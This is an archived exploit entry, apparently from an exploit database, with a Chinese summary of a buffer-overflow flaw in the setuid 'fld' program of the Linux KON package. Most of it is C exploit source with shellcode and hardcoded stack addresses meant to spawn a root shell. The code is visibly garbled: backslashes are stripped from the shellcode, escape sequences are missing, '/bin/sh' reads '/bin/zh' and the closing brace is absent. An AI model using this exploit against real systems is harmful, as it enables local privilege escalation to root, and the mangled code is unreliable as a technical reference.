https://www.exploit-db.com/exploits/20024
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200006-086

LinuxKanjionConsole(KON)包中fld程序存在缓冲区溢出漏洞。本地用户借助包含CHARSET_REGISTRY或CHARSET_ENCODING设置的输入文件可以提升根特权。

/*
source: http://www.securityfocus.com/bid/1371/info

KON (Kanji On Console) is a package for displaying Kanji text under Linux and comes with two suid binaries which are vulnerable to buffer overflows. "fld", one of the vulnerable programs, accepts options input from a text file. Through this mechanism it is possible to input arbitrary code into the stack and spawn a root shell. The other binary, kon, suffers from a buffer overflow as well. The buffer overflow in kon can be exploited via the -StartupMessage command line option, and fld via the command line options: -t bdf <file to be read> 
*/

/* Exploit code for /usr/bin/fld
  
   Compile with : gcc -o xp xp.c
   
   Made by : E-Ligth (Hugo Oliveira Dias) 01/08/2000 
*/


 #include <string.h>
 #include <stdlib.h>
 #include <stdio.h>

 #define OFFSET 0
 #define BUFFSIZE 541
 #define NOP 0x90

 char shellcode[] =
   "xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"
   "x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"
   "x80xe8xdcxffxffxff/bin/zh";

 unsigned long get_esp(void) {
    __asm__("movl %esp,%eax");
 }

 int main(int argc,char *argv[])
 {
   int bsize = BUFFSIZE;
   int offset = OFFSET;
  int i;
   long *addr_ptr, addr;
   char *ptr,*buf,*env;
   char arg[30];

  if (!(buf = malloc(bsize))) {
      printf("Can't allocate memory.n"); 
      exit(0);
   }
 
 
  ptr = buf;
  for (i = 0; i < bsize; i++)
 
     *(ptr++) = shellcode[i];
   
  buf[519] = 0x3c; /* Saved EBP 0xbffffa3c */ 
  buf[520] = 0xfa;
  buf[521] = 0xff;
  buf[522] = 0xbf;
 
  buf[523] = 0x10; /* Return Address  0xbffff710 */ 
  buf[524] = 0xf7;
  buf[525] = 0xff;
  buf[526] = 0xbf;
    
  buf[527] = 0x90; /* fp variable 0x804bf90 */
  buf[528] = 0xbf;
  buf[529] = 0x04;
  buf[530] = 0x08;
 
  buf[531] = 0xef; /* variable thats shouldn�t be destroyed 0xbffffbef */
  buf[532] = 0xfb;  
  buf[533] = 0xff;
  buf[534] = 0xbf;
    
  buf[535] = 0x60; /* variable thats shouldn�t be destroyed 0x40013460 */
  buf[536] = 0x34;
  buf[537] = 0x01;
  buf[538] = 0x40;
   
  memcpy(buf,"-type "",7);
  buf[540] = '';
  buf[539] = '"';
 
  memcpy(arg,"-type bdf ./code",16);
  arg[16] = '';   
 
  env = (char *) malloc(bsize + 10);
  memcpy(env,"EGG=",4);
 
  strcat(env,buf);
 
  putenv(env);
 
  system("/bin/bash");
 
   exit(0);

来源:BUGTRAQ
名称:20000619Problemswith”kon2″package
链接:http://www.securityfocus.com/templates/archive.pike?list=1&msg;[email protected]
来源:BID
名称:1371
链接:http://www.securityfocus.com/bid/1371